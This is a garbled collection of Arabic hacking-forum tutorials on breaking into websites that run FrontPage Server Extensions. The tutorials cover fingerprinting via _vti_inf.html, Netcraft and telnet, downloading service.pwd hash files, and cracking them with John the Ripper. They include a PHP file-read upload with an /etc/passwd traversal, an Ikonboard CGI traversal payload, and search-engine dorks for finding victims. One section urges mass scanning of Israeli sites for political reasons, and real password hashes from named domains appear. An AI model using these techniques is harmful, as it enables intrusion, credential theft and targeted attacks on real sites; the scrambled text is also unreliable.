وظيفته انسان إال هو ما المخترق بأن اؤمن بأني أخيرا اذكر وهو همه ليسانسان و الشبكات و النظم تحليل و ادارة و البرمجة

القليل  معرفةو اآلخرون به تعب بما العبث و التخريب في تساعده التي األمور من

لذا و ، االنترنت بمقاهي التسكع و الدردشة في الوقت تضييع فافترضبأن

لـ يحتاج ال و واضحا سيكون أقوله  . Screen Capture ما

الموضوع @  : خريطة

؟ . الموضوع قراءة عند ستسفيده الذي  ما مقدمة .

الـ . هو  ؟ FrontPage Server Extensions ماالـ . عمل آلية هي  ؟ FrontPage Extension Server ما

بـ . االتصال  FrontPage Extension Server كيفيةالـ . يدعم الموقع هل معرفة ال FrontPage كيفية  أم

فيصالحك . ليصبح استغالله  كيفية

؟ @ للموضوع قراءتك عند ستستفيده الذي  ما

الـ * هو ما  . FrontPage Server Extensions ستعرف

عمله *  . آليةموقع * بأي الخاصة المعلومات جمع  . كيفية

به * الخاص بالخادم االتصال عند منه لالستفادة  . بعضالطرق

 : مقدمة @

، لعمالئها الراحة شبل شتى توفير بأنواعها التسكين شركات تسعىلـ دعم مثل العمالء الرضاء التخفيضات و العروض يقدمون فتجدهم

PHP و CGI و Perl و SSL و FTP و SQL . 

المواقع لمدارء بالنسبة لهم Webmasters و المفضل البرنامج فإنهو مواقعهم هو Microsoft Office FrontPage لتصميم كما الذي و

يأتي  مبينحزمة ، Office مع بعض يوفر انه كما استعماله بسهولة يتميز اذ

كامل دعم التسكين شركات تقدم لذا و ، الزوار عداد مثل البرمجيات . للبرنامج

الـ @ هو  ؟ FrontPage Server Extensions ما

االصدار : ( حزمة بعد أتت التي الحزم عن حاليا سأتكلم مالحظة ) الثاني

الخادم في تثبيتها يتم البرامج من حزمة عن عبارة Server هوالخصائص بعض لدعم قالبية لها التي التسكين  . الخاصبشركة

منها مجلدات عدة انشاء يجب التثبيت عند  : و

/_private /_vti_bin /_vti_cnf /_vti_log /_vti_pvt /_vti_txt 

يهمنا مجلد كل وظيفة عن سأتكلم  : و

 : vti_bin_ المجلد *

هما مجلدان بداخله يتواجد  : و

المجلد : ( إلى تشيران النقطتان  ) vti_bin_ مالحظة

../_vti_adm/ ../_vti_aut/ 

وال بالمشرف الخاص أنه اذ األول المجلد يهم ما بقدر يهمنا ال الثانيبه الخاصة المرور كلمة على تحصل لم اذا منه االستفادة  . تستطيع

هما ملفان يوجد  : كما

../shtml.exe ../fpcount.exe 

 : vti_pvt_ المجلد *

التالية الملفات هو منها يهمنا ما ملفات عدة بداخله يتواجد  : و

الخاصة : service.pwd الملف - المرور كلمة و المعرف يتواجد فيه وبمقياس  . DES بالمشرفمشفرة

و : service.grp الملف - مشرفين من المعرفين يتواجد فيه وauthors . 

مسارات : doctodep.btr و deptodoc.btr ملفي - يتواجد فيه وفتستطيع بتنزيله قمت فاذا ، الخادم على تحميلها تم التي الملفات

الملفات  معرفةبالموقع  . الموجودة

المجلد في يوجد اذ المجلد محتويات معاينة تستطيع ال الغالب في وملف للموقع و ) htaccess. الرئيسي المالك الجميع بمنع يقوم

و  المجموعةمحتوياته ( و المجلد معاينة من  . الزوار

تعتبر : ( بأنها يعني المجلدال على صالحية أي وضع عدم ان مالحظةالناحية ضعفمن لكن و  ) ثغرة

 : private_ المجلد *

هو فقط واحد ملف بداخله يتواجد  . htaccess. و

الـ @ عمل آلية هي  ؟ FrontPage Extension Server ما

الـ و العميل بين االتصال على FrontPage Extension Server يعتمدالـ  . HTTP بروتوكول

الـ برنامج طريق عن الزوار عداد معاينة اردنا فانه FrontPage فلوطلب ارسال بالـ Request يتم الخادم يمرره ثم FrontPage للخادم

Extension Server مثل الخادم ببرمجيات بالتالي يمرره الذي ، fpcount.exe و ثم من والـ إلى أخرى مرة تمريره و Extension Server يكرر الخادم إلى و

المخرجات  يظهرنار جدار عبر تتم االتصاالت هذه ان علما ، العميل  . لـ

بـ @ االتصال  : FrontPage Extension Server كيفية

، العمالء لراحة تسعى التسكين أغلبشركات ان سابقا ذكرنا كماالـ خدمة تدعم للموقع FrontPage فتجدها الصفحات لتحميل ذلك و

بأنها  علماالـ بروتوكول عبر FTP تدعم المجلدات انشاء و الملفات تحميل و

الخادم بناحية تعمل التي البرمجيات على اعتمادا  . المتصفحبالـ االتصال كيفية لمعرفة التالي بتنفيذ قم اآلن FrontPage و

Extension Server : 

الـ : ( حزمة عن حاليا سأتكلم عن XP مالحظة أبدا تختلف ال التي والشكلية النقاط بعض في إال الباقية  ) الحزم

الـ * برنامج بتشغيل حزمة FrontPage قم مع مرفقا يأتي الذي وOffice . 

قائمة * باختيار File من  . Open Web قمالمشفرة ) ( * ليست و األصلية المرور كلمة و المعرف باضافة  . قمعندها * و كلها الموقع ملفات الخادم لك سيظهر كانتصحيحة اذا

معاينة و المجلدات و الملفات في التعديل و التحميل تستطيعالمصدرية  الشفرة

 . للملفاتأو * الخدمة يدعم ال الموقع بأن يعني فهذا بنجاح العملية تتم لم اذا

وضعية في معاينتها منك يطلب و خاطئة المرور كلمة أو المعرف أنال و  القراءة

التي الملفات و المجلدات وال األصلية المصدرية الشفرة لك يظهرالموقع  . يحويها

الـ @ يدعم الموقع هل معرفة ال FrontPage كيفية  : أم

بيج الفرونت لدعم الموقع قابلية لمعرفة الطرق من العديد يوجدمنها  : نذكر

التثبيت * نجاح ملف  : معاينة

ملف : ( تجد ال قد أن vti_inf.html_ مالحظة يعني ال هذا لكن وثغرة يعتبر ال أنه كما ، الخدمة يدعم ال  ) الموقع

الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قمFrontPage ال  . أم

ملف - بمعانية بارفاقه vti_inf.html_ قم ذلك و المتصفح بواسطةمثال ، الموقع  : بعنوان

http://www.Victim.com/_vti_inf.html 

جملة - ستجد الصفحة معاينة عند FrontPage Configuration وInformation ، الـ حزمة أن معناه FrontPage Extension Server فهذا

تثبيتها تم  قدبنجاح الخادم  . في

بالتالي قم الخدمة اصدارة لمعرفة  : و

باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode . 

بالبحثعن - لالصدار Version حيث "FPVersion="Version قم تشيربالخدمة  . الخاص

مجلد * طريق  : vti_cnf_ عن

الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قم

FrontPage ال  . أمبعنوان - بارفاقه ذلك و المتصفح بواسطة المجلد بمعانية قم

مثال ،  : الموقع

http://www.Victim.com/_vti_cnf 

باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode . 

التالية - الشفرة عن بالبحث  : قم

vti_generator:Programe 

حالتنا Programe حيث - في سيكون و اصدارته و البرنامج لنوع يشيرهي Microsoft FrontPage X هو به الخاصة االصدارة  . X و

للصفحة * المصدرية الشفرة  : الكشفعن

الـ - يدعم به الخاص الخادم هل تعرف أن تريد موقع أي بزيارة قمFrontPage ال  . أم

باختيار - قم ثم ، الصفحة على األيمن الفأرة بزر بالنقر Source قمCode . 

الرأس - ترميزي بين بالبحث التالية >Head<>/Head< قم الشفرة عن: 

>**** Name="GENERATOR" &@#&@#&@#&@#&@#&@#&@#="Programe"< 

هو Programe حيث - البرنامج كان اذا و البرنامج لنوع يرمزMicrosoft FrontPage X.0 يدعم بالموقع الخاص الخادم بأن لنا يتبين

و بيج  الفرونتهي به الخاصة  . X االصدارة

موقع * طريق  : NetCraft عن

الموقع - بزيارة  . NetCraft.net قمالـ - مستثنيا الموقع عنوان بكتابة  . //:http قم

ثواني - بضع  . انتظرالخدمات - و الملقم عن المعلومات بعض أعطاك الموقع أن ستجد

من و ، للبرنامج دعمه قابلية معرفة تريد الذي الموقع في الموجودةالخدمات  تلك

الـ بالشكل FrontPage خدمة لك ستظهر X حيث mod_frontpage/X والـ الصدارة  . FrontPage Extensions Server يرمز

الـ * طريق  : Telnet عن

عن : ( المعلومات بعض معرفة في الطريقة هذه تساعد مالحظةالسابقة الطريقة نفسمخرجات هي المخرجات و  ) الخادم

قائمة - باختيار Start من ستظهر Run قم التي بالنافذة اكتب وTelnet . 

المنفذ - عبر بالموقع باالتصال التالي 80قم بالشكل : 

Microsoft Telnet< Open www.Victim.com 80 

طلب - بارسال الطريقة Request قم لتكن و هي Method للخادمHead . 

بروتوكول : ( مع التعامل بكيفية االلمام عليك  ) HTTP مالحظة

حيث - التالي بارسال  http://www.Victim.net قم الضحية الموقع هوالخاصبك ISP.net و الخدمة بمزود الخاص البروكسي  : هو

Head www.Victim.net HTTP/1.1 Host: ISP.net 

Accept: */* Connection: close 

ثواني - بضع  . انتظراالجابة - للخادم Response ستستلم ارسلتهب الذي الطلب عنServer الخدمات و الملقم نوع و للصفحة تعديل آخر تاريخ مثل

به  . المتوفرةالطريقة في وجدناه نفسالذي ستجد الخدمات ضمن من و

الـ خدمة أن هو و بالشكل FrontPage السابقة لك ستظهر وmod_frontpage/X 

الـ X حيث الصدارة  . FrontPage Extensions Server يرمز

صالحك @ في ليصبح استغالله  : كيفية

على صالحيات وضع يتم لم و الخدمة هذه يدعم موقع على عثرت اذاالـ بالتالي vti_pvt_ مجلد  : قم

حالتنا : ( في و الخادم ناحية على تعمل بلغة االلمام عليك مالحظةالـ ، PHP فهي اللغة هذه دعم الضحية الموقع على أن  ) كما

الضحية * بالموقع باالتصال  . قمبـ * امتداده ينتهي ملف بتحميل التالي PHP قم ضمنه  : و

>?PHP 

$open = FOpen)$file, "r"(; $get = FGets)$open, FileSize)$file((; 

Echo $get; 

FClose $open; 

?< 

ملف برفع هنا قمنا ثم PHP و معين غير ملف بفتح يقوم للخادميغلق ثم يعرضه ثم بالبايت حجمه حسب على محتوياته يحضر

كل اآلن و ،  الملفبـ الحاقه و المتصفح عبر الموقع على الدخول هو اآلن فعله عليك ما

المتغير و حملته الذي الملف معاينة file بعنوان تريد الذي الملف و الشفرة

مثال ، به الخاصة  : المصدرية

http://www.Victim.com/uploded_file...../../etc/passwd 

و uploded_file حيث ، بتحميله قمت الذي الملف السم يشيرالمجلدات و الملفات بمعاينة لك تسمح اوامر اضافة تستطيع

الخادم في  . الموجودة

،،،انتهى

بيج " الفرونت تدعم التي المواقع " اختراق

> إعصار منتدى من >منقول> المدمر: >الكاتب

بنظام خاصة الثغرة هذه ان يعلم منا //اكثر

NT - Unix 

تدعم -1 المواقع هذه هل لمعرفة طريقة بشرح اآلن أقوم وسفfrontpage ال؟ أم

األسهل إال أذكر ولن طرق :بعدة

موقع - إلى netcraft بالذهابhttp://www.netcraft.com/

يظهر البحثسوف وبعد الموقع اسم وكتابةmod_frontpage/x

x=) بيج بالفرونت الخاص اإلصدار )رقمجملة - إضافة طريق عن

vti_inf.html_/لنفرضأن الموقع عنوان بعد

/http://www.almodammer.com:الموقعالطريقة بهذه ليصبح الجملة نضيف

http://www.almodammer.com/_vti_inf.htmlاضغط Enter وبعدها

الكلمة هذه الصفحة أول في يطلعلك وراحFrontpage Configuration Information

بيج الفرونت وبرامج مجلدات تثبيت تم قد  أيال - أم بيج الفرونت يدعم الموقع معرفة تستطيع  وأيضا

بإضافةvti_cnf_/

المثال كهذا الموقع عنوان :بعدhttp://www.almodammer.com/_vti_cnf

واختار األيمن الفأرة زر  واضغط

source المصدروابحثعن

vti_generator:Programeحيث

Programe به الخاصة واإلصدارات بيج الفرونت برنامج لنوع تعني

--------------------------------------------------

يدعم -2 الموقع وعرفنا لملف frontpage ألحين نوصل نقدر كيفالباسوورد؟

يبدعم الي الموقع هات إنت واعلمك frontpage بسيطةالمثال سبيل وعلى يعني

http://www.almodammer.com/ملف fontpage يدعم إلى نذهب _vti_pvt طيب

يعني كذاhttp://www.almodammer.com/_vti_pvt

تأتي التي الملفات وأهم عديدة ملفات وجود نالحظ ماندخله وأول:باسم

=============Adminstrator.pwdAdminstrators.pwd

Service.pwdUsers.pwdUser.pwd

Author.pwd=============

وجود نالحظ نالحظ ماذا الملفات هذه أحد فتحنا إننا لنفرض  ألحينusername:passwd

والباسوورد المستخدم اسماشوف ابي جيت ولما بيج بالفرونت موقع اخترقت انا يعني

ملف طلعلي على service الملفات user / password يحتويالملف مضمون وهذا

operator:hi9LHn9wAMuKMالمستخدم اسم operator:حيث

هي المشفرة hi9LHn9wAMuKM:الباسوورد

إال ماباقي المشفر الباسوورد نطلع كيف يااخواني وعرفنا ألحينتشفيره نفك

كثير ببرامج يتم  وهذا=)Crack Jack(=

=)John The Ripper(=

وهو تداوال واألكثر األفضل نستخدم  راحJohn The Ripper

الموقع هذا من البرنامج ::لتحميلhttp://www.openwall.com/john

البرنامج بهذا التشفير تفك  كيف

مجلد إلى البرنامج تنقل تروح شي أول\:c

مجلد تفتح RUN بعديننصي مستند الملف txt وتسويلك كلمة passwd وتسمي فيه وتضع

تشفيرها تفك تبي الي السرإلى إذهب

 start ابدأ run تشغيل

األمر اكتبcommand

على يفتح Enter اضغط راح  وبعدهاالـ DoSإطار

مجلد إلى RUN اذهبمن تطلع تبي واذا لك تظهر راح الي المجلدات من بالخروج وذلك

األمر استخدم مجلد أي..cd

توصل  حتى>\:cاكتب بعدين

cd johnعلى  Enter اضغط

الشكل بهذا لك يظهر وراح>c:\john واكتبcd RUN

الطريقة بهذه ليصبح المجلد وبتدخل>c:/john/RUN

برنامج أوامر نكتب John The Ripper ألحينوهي====

john -i:all passd.txt--------------------------

واالحتماالت األنواع جميع عن لك يبحث

====john -i:Alpha passwd.txt ----------------------------------

الصغيرة األحرف عن يبحث

====john -i:Digits passwd.txt ----------------------------------

األرقام عن يبحث

====john -single passwd.txt ---------------------------------

المستخدم اسم تطابق التي الباسووردات عن لك يبحث أمر

--------------------------------------------------------------------------------

فكيت إنت هل تشوف تبي وإذا األوامر هذي كل ماتجرب وبعدإلى إذهب أل وال الباسوورد وكسرت

john.potفك وبعد الباسوورد لك يعرض وراح البرنامج داخل الموجود

تشفيرها--------------------------------------------------------------------------------

عندك مستريح ألحين passwordوالـ username إنت؟ !!وشبقالك

من وأحسنها طرق بعدة دخوله ألحين لعب بالموقع تلعب /يقالك)1(

frontpage بعدين

file إلى وتذهبopen web وتضيف

على الملفات تعدل تقدر الحين انت كذا وعاد والباسوورد االسمكيفك

)2(FTP من

الـ ببرامج  المنتشرة FTPوعليكws-ftpكالـ pro ftpوالـ... والمزيد

من الطريقة عمل لك DOS ويمكنك وأضمن لك أسهل البرامج ولكن

======================================

روحوا أقولكم موقع على تجربون تبون أكيد google وألحينhttp://www.google.com/

البحث إطار في واكتبواvti_pvt_/

الثغرة هذه على تحتوي كثيرة مواقع تطلعلك وراح

بحث محرك وعندكhttp://www.altavista.com/

البحث محرك في تكتبlink:service.pwd

..أوlink:adminstrators

وجود االحتمال الملفات من .فيها password وغيرها

،،،انتهى

بيج " الفرونت تدعم التي المواقع " اختراق

> إعصار منتدى من >منقول> المدمر: >الكاتب

بنظام خاصة الثغرة هذه ان يعلم منا //اكثر

NT - Unix 

تدعم -1 المواقع هذه هل لمعرفة طريقة بشرح اآلن أقوم وسفfrontpage ال؟ أم

األسهل إال أذكر ولن طرق :بعدة

موقع - إلى netcraft بالذهابhttp://www.netcraft.com/

يظهر البحثسوف وبعد الموقع اسم وكتابةmod_frontpage/x

x=) بيج بالفرونت الخاص اإلصدار )رقمجملة - إضافة طريق عن

vti_inf.html_/لنفرضأن الموقع عنوان بعد

/http://www.almodammer.com:الموقعالطريقة بهذه ليصبح الجملة نضيف

http://www.almodammer.com/_vti_inf.htmlاضغط Enter وبعدها

الكلمة هذه الصفحة أول في يطلعلك وراحFrontpage Configuration Information

بيج الفرونت وبرامج مجلدات تثبيت تم قد  أيال - أم بيج الفرونت يدعم الموقع معرفة تستطيع  وأيضا

بإضافةvti_cnf_/

المثال كهذا الموقع عنوان :بعدhttp://www.almodammer.com/_vti_cnf

واختار األيمن الفأرة زر  واضغطsource المصدر

وابحثعن vti_generator:Programe

حيثPrograme به الخاصة واإلصدارات بيج الفرونت برنامج لنوع تعني

--------------------------------------------------

يدعم -2 الموقع وعرفنا لملف frontpage ألحين نوصل نقدر كيفالباسوورد؟

يبدعم الي الموقع هات إنت واعلمك frontpage بسيطةالمثال سبيل وعلى يعني

http://www.almodammer.com/ملف fontpage يدعم إلى نذهب _vti_pvt طيب

يعني كذاhttp://www.almodammer.com/_vti_pvt

تأتي التي الملفات وأهم عديدة ملفات وجود نالحظ ماندخله وأول

:باسم=============

Adminstrator.pwdAdminstrators.pwd

Service.pwdUsers.pwdUser.pwd

Author.pwd=============

وجود نالحظ نالحظ ماذا الملفات هذه أحد فتحنا إننا لنفرض  ألحينusername:passwd

والباسوورد المستخدم اسماشوف ابي جيت ولما بيج بالفرونت موقع اخترقت انا يعني

ملف طلعلي على service الملفات user / password يحتويالملف مضمون وهذا

operator:hi9LHn9wAMuKMالمستخدم اسم operator:حيث

هي المشفرة hi9LHn9wAMuKM:الباسوورد

إال ماباقي المشفر الباسوورد نطلع كيف يااخواني وعرفنا ألحينتشفيره نفك

كثير ببرامج يتم  وهذا=)Crack Jack(=

=)John The Ripper(=

وهو تداوال واألكثر األفضل نستخدم  راحJohn The Ripper

الموقع هذا من البرنامج ::لتحميلhttp://www.openwall.com/john

البرنامج بهذا التشفير تفك  كيف

مجلد إلى البرنامج تنقل تروح شي أول\:c

مجلد تفتح RUN بعديننصي مستند الملف txt وتسويلك كلمة passwd وتسمي فيه وتضع

تشفيرها تفك تبي الي السرإلى إذهب

 start ابدأ run تشغيل

األمر اكتبcommand

على يفتح Enter اضغط راح  وبعدهاالـ DoSإطار

مجلد إلى RUN اذهبمن تطلع تبي واذا لك تظهر راح الي المجلدات من بالخروج وذلك

األمر استخدم مجلد أي..cd

توصل  حتى

>\:cاكتب بعدين

cd johnعلى  Enter اضغط

الشكل بهذا لك يظهر وراح>c:\john واكتبcd RUN

الطريقة بهذه ليصبح المجلد وبتدخل>c:/john/RUN

برنامج أوامر نكتب John The Ripper ألحينوهي====

john -i:all passd.txt--------------------------

واالحتماالت األنواع جميع عن لك يبحث

====john -i:Alpha passwd.txt ----------------------------------

الصغيرة األحرف عن يبحث

====john -i:Digits passwd.txt ----------------------------------

األرقام عن يبحث

====john -single passwd.txt ---------------------------------

المستخدم اسم تطابق التي الباسووردات عن لك يبحث أمر

--------------------------------------------------------------------------------فكيت إنت هل تشوف تبي وإذا األوامر هذي كل ماتجرب وبعد

إلى إذهب أل وال الباسوورد وكسرتjohn.pot

فك وبعد الباسوورد لك يعرض وراح البرنامج داخل الموجودتشفيرها

--------------------------------------------------------------------------------

عندك مستريح ألحين passwordوالـ username إنت؟ !!وشبقالك

من وأحسنها طرق بعدة دخوله ألحين لعب بالموقع تلعب /يقالك)1(

frontpage بعدين

file إلى وتذهبopen web وتضيف

على الملفات تعدل تقدر الحين انت كذا وعاد والباسوورد االسم

كيفك

)2(FTP من

الـ ببرامج  المنتشرة FTPوعليكws-ftpكالـ pro ftpوالـ... والمزيد

من الطريقة عمل لك DOS ويمكنك وأضمن لك أسهل البرامج ولكن

======================================

روحوا أقولكم موقع على تجربون تبون أكيد google وألحينhttp://www.google.com/

البحث إطار في واكتبواvti_pvt_/

الثغرة هذه على تحتوي كثيرة مواقع تطلعلك وراح

بحث محرك وعندكhttp://www.altavista.com/

البحث محرك في تكتبlink:service.pwd

..أوlink:adminstrators

وجود االحتمال الملفات من .فيها password وغيرها21. العشوائي " اإلختراق

>منقول<> الكندور: >الكاتب

العشوائي - الـإختراق Random Hacking ماهوالـ - غير إستثمارات على يبحث يصبح بحيث CGIScripts تطويره

عليها - الحصول بعد ثغره اي تستغل كيف

العشوائي - الـإختراق Random Hacking ماهوسهل وهذا ، محدده ثغره عن المواقع من كبيره كميه في البحث هوروح ، جدا بسيط مثال ، لإلختراق جاهزه جدا كثيره بمواقع ويعود

الـ على تعتمد التي البحث محركات من ، بحث محرك spiders علىمثل العناكب ، link:xxxx.cgi or pl وأكتب altavista.com أو إرجع(

البحث رياضيات في زورو بإسم )لشرح لملف لنك عن نبحث مثالhelp.cgi ، link:help.cgi كلها للبحث نتيجه لك المردوده المواقع

منتدى ، Ikonboard تملك الكود المصدر في وأبحث منها واحد إفتحHTML عنه بحثت الذي السكربت ، help.cgi عن مكانه اين لتعرف

هنا http://www.example.com/cgi-bin/help.cgiلنفرضمكانهليصبح العنوان غير الملف بعد -http://www.example.com/cgi أكتب

bin/help....on=../members/[member].cgi%00تغيير مالحظه طبعا [] [member] مع القوسين وبدون عضو بإسم

المرور كلمة ظمنها ومن كامله العضو معلومات يعرضلك سوفالمنتدى لـ الثغره موضوعي Ikonboard 2.1.7 وهذه ليسلب وهذا

فقط مثال أبسط أحضرت ألني تحفظه ال ومثال بدايه هي ولكنالـ ملفات آالف بل مئات غيره مثل CGIScript فيوجد ثغرات تملك

خالل من تكون إستثماراتها واغلب  url هذهآي جي السي ملفات لثغرات اإلستثمارات هذه مثل على للحصوليهم ما ولكن أعتقد روسيه لغته وهو هذا األرشيف سكريبتشوف

الـ عن نبحث اإلستثمار Exploit ألننا أوhttp://www.secure.f2s.com/eng_ver/bugs/البحث محرك في وتضعه مثال المنتج إسم تأخذ وممكن

 /http://www.securiteam.com لـ في تشترك أو ، النتائج وتشوفشاركتمن أنا جدا مفيده فوكسفهي سيكيورتي لـ البريده القائمه

لـثغرات وليس األمن في مختصه وهي بها أعجبت وجدا فتره قبلبرنامج .... ويوجد شئ وكل واخبار امن يعني ، سكربت آي جي السي

هو ، فوكسبيجر سيكيورتي بإسم فوكسي سيكيورتي تقدمه... الخ ووو األخبار على الحصول عمليه لتسهيل برنامج

الـ - غير إستثمارات على يبحث يصبح بحيث CGIScripts تطويرهموقع اي تخترق يعني ، عشوائي فعال كان إذا العشوائي اإلختراق

أنه !! في إحنا منه نستفيد ممكن لكن ، همجيه فهذه سبب بدون ولواللي إسرائيل مثال ، كيف لك اقول أنا ، همجي شكل في يكون ما

النار إطالق بأوقاف الفلسطينيين يأمرون الذين ، يكرهها ،  الكل ظلموا ألنهم نكرههم ال ، يهود أنهم ليسألجل يكرههم الكل

هو هذا مواقعهم من آالف فيه موقع عندهم ، 12610فلسطين sites بـ 1104و co.il تنتهي sites بـ 70و org.il تنتهي sites بـ و ac.il تنتهي

78 sites. بـ و gov.il تنتهي ، مهمه 54وهذه sites. بـ 29و net.il تنتهي sites. بـ 2009و muni.il تنتهي sites بـ ، com تنتهي 137و sites.

بـ ، لعينه .edu - 4 sites و .org - 121 sites و net تنتهي israel.net - 84 sites. و il - sites. ........ روح السايت هذه كل على تحصل عشان

هذا http://iguide.co.il/sites/sites.htm الموقع

بحث محركات كمان  وفيه

http://www.achla.co.il/http://www.reshet.co.il/data/index.vs?dw=1

http://www.maven.co.il/http://www.tapuz.co.il/http://www.walla.co.il/

http://www.info.gov.il/find.pl

هو واللي منها أعدم محرك altavista.co.il وفيه

هذه في الموجوده للبيانات فرز يصلح أن شخصمنا كل على المهمفرز يصلح برنامج ليصنع يتقنها التي اللغه يستخدم ، المواقع

معها ثانيه اشياء بدون تكست ملف في ويضعها

مثال ، منتج عن كلها فيها البحث هي الثانيه ، /w3-msql العمليهمثال بروكسي مع الشبك يتم أوال ، جدا سهله الطريقه

proxy.isp.net.sa :8080 أمر له يرسل ، GET وثم ترسل مثال للبروكسي

GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 

Accept-Language: ar-saUser-Agent: Mozilla/4.0 )compatible; MSIE 5.5; Windows 98(

Host: www.com.ilProxy-Connection: Keep-Alive

الموقع أحضار البروكسي من يطلب -http://www.com.il/cgi وهوbin/  ، لـ طلبنا ، /cgi-bin/w3-msql يتضح نبحثعن ال الحقيقه في

بها يوجد التي المواقع كل عن نبحث ولكن ، آي جي ثغراتسي، WWWMSQL المنتج جمعناها التي مثال اإلسرائليه المواقع يعني

الذي البرنامج في وتدخل واحد واحد تأخذ كلها تكست ملف فيعن بحثا البروكسي الى وترسل وثم cgi-bin/w3-msql صممناه

كل من ننتهي حتى وهكذا ، خارجي ملف في البروكسي رد يحفظالمنتج إيجاد تم التي ونشوف الملف نفتح وثم ، المواقع

WWWMSQL فوكس سيكيورتي الى ونتوجه ، يوجد لم والتي داخهاوابحثعن يعجبك موقع أي واال تيم سيكيورتي ، w3-msql واال مثال

نجد تيم سيكوتي المتصفح w3-msql لـ Exploit في من تطبيقه يمكنهنا وهو ،http://www.securiteam.com/exploits/2WUQBRFS3A.htmlانا أسميها فيها منتج عن بحثا مواقع فحصعده Random طريقه

Hacking عن بحثت فعال لو ولكن ، عشوائي إختراق w3-msql يعنيلن أو كثير تلقى راح ما بأنك لك أقول فأنا اإلسرائليه المواقع فيتبحثعن ممكن ، شئ فيها /vti_pvt_/ تجد التي المواقع كل لترصد

من المسترجعه المعلومات كل حفظ يتم ما بعد وطبعا ، بيج فرونتبشكل تكون يكون HTML البروكسي الملف خل أنت كذا عشان

عنها html.* بنسق كتب اللي ، المواقع كل وتجد The page.. وافتحهcannot be displayed واللي Forbddien واللي ....not found .... ، الخ

مسموح غير ولكن موجود واال فاوند نت اللي تعرف الردود هذه منمو .. واللي عليه موجود اللي تعرف الطريقه بهذه الخ له بالوصول

عليك ..... والباقي  موجود

عليها - الحصول بعد ثغره اي تستغل كيفكانت كود url إذا ، فلسفه لها يبغا قابلت c ما أو تشغله عرفت ومابلغه ولكن لـه ثاني فرجون عن تبحث فممكن أخطاء أو perl فيه

Shell *.sh يقابل الذي في Batch وهو عنها وتحدثنا ويندوز فيأكتب بيرل أكتيف تثبت ما الدوسبعد من ، البرمجه لغات perl كوكب

exploit.pl الـ كان تغييرها exploit إذا أشياء فيه طبعا ولكن بيرل بلغهعالمات بين مكتوبه تكون األشياء وهذه ، نفسه الكود في

في   التعليقات ، بيرل في تعرفشئ ما إذا مشاكل بتواجه وأكيد بالصور تطلبشرح ال الناحيه قدرت   هذه ما طويل رد لك رجع إذا

وإسم > مسافه وثم عالمة طريق عن الخرج تحفظ ممكن تقراهمثال perl exploit.pl < log.htm الملف

الـ بعض ألن ، مشاكل فيه تواجه فقط بيرل أكتيف للمنتج وبالنسبهExploit زين يعمل ما وممكن خمسه وممكن أربعه اإلصدار في كتب

في تعدل أو عندك المفسر لتغير تضطر قد لذلك بيرل أكتايف فيليونكس فكره وعلى ، اللغه في خبره يطلب كله وهذا أعمل( الكود

) RedHat 6.2 على بيرل أكتيف من افضل جدا ممتاز بيرل مفسر فيهالمرات .بعشرات

،،،انتهى

المواقع " اختراق في والمثلى الصحيحة " الطريقة

>منقول<> marwan911 :الكاتب<

المعلومات اخذ هي واللي االختراق في خطوة  اول

والنظام عليه شغال اللي الملقم شنهو الفالني الموقع نعرف يعنييدعمها اللي  .والخدمات

اثنين اشهرها  الملقمات

IIS: ( . مقفلة قليل ومواقع ثغرات مليانة وهذه مايكروسوفت من ثغراتها(

apache: واختراقها العالم انحاء في متوزعين مبرمجين مجموعة منصعب  .شبه

 طيب

موقع عندنا  الحين

كلها والمعلومات والخدمات والملقم التشغيل نظام نعرف  وشلون

الموقع  http://www.netcraft.net عندك

 ادخله

مربع  تالقي

فوق اللي المعلومات تعرف تبي اللي الموقع فيه تحط  هنا

هو اللي االبيض البيت موقع نحط  whitehouse.org مثال

غير: من نكتبه باالخير / //:http مالحظة اللي  وال

http://uptime.netcraft.com/up/graph....whitehouse.org 

التالي لنا يطلع  راح

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000 

 طيب

مهمتين معلومتين عرفنا  الحين

الملقم على شغال انه شيء  IIS5.0 اول

ويندوز نظام على شغال 2000ثانيشيء  

 حلو

ثغرات نجرب شيء ( IIS5.0 اول الموضوع ) بعد احطها راح  عليه

ويندوز نظام ثغرات نشوف شيء مانفع الموقع ) 2000إذا احط راح ) الموضوع  بعد

 طيب

كود يوني اسمها حاجة فيه  الحين

المتصفح طريق عن فيها تخترق  هذه

ملقمات مع إال تحطها IIS وماتمشي طويلة عناوين عن عبارة وهي . عليها امثلة احط راح الموقع عنوان  .بعد

ثغرات؟ فيها ماطلع انه لنفرض  طيب

نفسه الموقع محتويات  نشوف

من ثغراتها ونطلع او او او منتدى او زوار سجل عنده كان إن نشوفالموضوع بعد اللي الرد في ارفقه راح اللي  .الموقع

اباتشي؟ السيرفر كان لو  طيب

ارانك موقع مثال ناخذ  www.arank.com خلونا

التالية النتيجة نشوف راح كرافت بالنيت حللناه  لو

The site www.arank.com is running Apache/1.3.20 )Unix( mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6

mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux 

اشياء ثالث يهمنا هنا  طيب

وهو بيج apache 1.3.20 الملقم فرونت دعم FrontPage/5.0.2.2510 ووهو النظام والثالث ثغرات مليانة  Linux وهذه

 طيب

 الملقم

بعض إال اإلختراق الصعبة الملقمات من اباتشي شيء اولجنب على هذه فنحط منها  .اإلصدارات

بيج الفرونت دعم  نشوف

ثغرات مليان بيج الفرونت ماقلنا  زي

تقريبا وكثيرة قوية  وثغراته

مجلد فايدة private_ و vti_pvt_ منها مامنه غيره نحتاجها اللي  هذه

وهي مهمة ملفات اربع نالقي راح المجلدين و service.pwd داخلusers.pwd و authors.pwd و adminstators.pwd اخطر هذا ويعتبر

 ملف

هذه ) الثغرة مالحظة هذه الملفات من واحد ننزل قدرنا لو طيبب ( 70موجودة نفتحها% نزلناها لو عالنت الموجودة المواقع من

المثال سبيل على هذا السطر ونالقي  بالمفكرةgoodyco:CalXS8USl4TGM 

موقع من وهذا http://www.goody.com.sa/_vti_pvt/service.pwd قودي

الحين هو goodyco طيب واللي والباسسمشفر اليوزرCalXS8USl4TGM 

اسمه ببرنامج ينفك ينفك؟  john the repaier وشلون

